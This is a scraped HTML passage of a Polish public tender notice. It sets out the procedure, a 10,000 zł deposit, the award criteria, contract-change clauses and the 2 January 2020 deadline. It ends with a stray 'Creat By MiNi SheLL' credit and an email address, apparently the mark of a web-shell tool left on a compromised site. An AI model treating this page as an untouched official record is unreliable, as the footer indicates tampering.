wniesienia wadium, 4) zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (w przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 10 000,00 zł (słownie złotych: dziesięć tysięcy 00/100 zł).2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub w kilku z następujących form, w zależności od wyboru Wykonawcy:1) pieniądzu, przelewem na konto Zamawiającego w Banku Gospodarstwa Krajowego Oddział Szczecin, nr konta: 70 1130 1176 0022 2137 2520 0001, z dopiskiem: „Wadium nr postępowania: 65/2019”. Wiążąca jest data uznania rachunku Zamawiającego, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,3) gwarancjach bankowych,4) gwarancjach ubezpieczeniowych,5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 i 2260 oraz z 2017 r. poz. 1089).3. Wadium wnoszone w formie poręczeń lub gwarancji:1) oryginał dokumentu potwierdzającego wniesienie wadium, winien zostać złożony w kasie Zamawiającego, a do oferty przetargowej Wykonawca winien załączyć, w oddzielnym opakowaniu (tj. w sposób niezłączony z ofertą), kopię dokumentu potwierdzającego wniesienie wadium,2) musi obejmować cały okres związania ofertą,3) powinno być wystawione na Zamawiającego,4) koniecznym jest, aby gwarancja lub poręczenie obejmowało odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 uPZP. Wadium wniesione w tej formie musi być bezwarunkowe oraz realizowane na pierwsze żądanie Zamawiającego.4. Zamawiający, niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, zwróci wadium wszystkim Wykonawcom z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a uPZP.5. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 13.4. SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.7. Zamawiający na podstawie wniosku Wykonawcy, który wycofał swoją ofertę przed upływem terminu składania ofert, niezwłocznie zwróci mu wadium.8. Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonymi o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.9. Wykonawca traci wadium wraz z odsetkami na rzecz Zamawiającego, jeżeli:1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,3) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a uPZP, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 uPZP, oświadczenia, o którym mowa w art. 25a ust. 1 uPZP, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 uPZP, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,4) Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy w przewidzianym terminie.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja jakości i rękojmia za wady</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Wysokość kary umownej za przekroczenie terminu realizacji zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający informuje, że przewiduje możliwości zmiany umowy. Zmiany zawartej umowy mogą nastąpić w formie pisemnego aneksu w następujących przypadkach:1) zmianie ulegnie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia lub wysokości wynagrodzenia Wykonawcy, np. z uwagi na zmianę stawki VAT (wynagrodzenie może być odpowiednio zwiększone lub zmniejszone w zależności od tego jaka będzie zmiana stawki podatku VAT),2) zmiany będącej następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: wstrzymanie robót przez Zamawiającego lub dokonanie przez Zamawiającego zmiany w technologii wykonania robót,3) zmiany będącej następstwem działania organów administracji publicznej, w szczególności: przekroczenia określonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.,4) braku dostępu do mediów na skutek awarii w dostawach energii elektrycznej, wody czy innych mediów niezbędnych do wykonania przedmiotu umowy powstałych z przyczyn nie leżących po stronie Wykonawcy, proporcjonalnie o czas trwania awarii,5) jeżeli strony dopuściły zmianę terminu realizacji przedmiotu umowy dopuszczalna jest także zmiana postanowień umowy obejmująca wydłużenie terminu ważności zabezpieczeń. Jeżeli strona trzecia, od której zależy przedłużenie ważności zabezpieczenia nie wydała zgody na takie przedłużenie, Wykonawca zobowiązany jest skorzystać z innych form zabezpieczenia,6) pojawienia się rozbieżności pomiędzy dokumentacją określoną w § 1 umowy, a stanem faktycznym skutkujących koniecznością zmiany technologii wykonania robót, której nie można było stwierdzić przed rozpoczęciem wykonywania prac.2. Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, Zamawiający może odstąpić od umowy w terminie do 30 dni od powzięcia wiadomości o tych okolicznościach.4. W przypadku, o którym mowa w ust. 3 niniejszego paragrafu, Wykonawca może żądać od Zamawiającego wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-01-02</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">j. polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com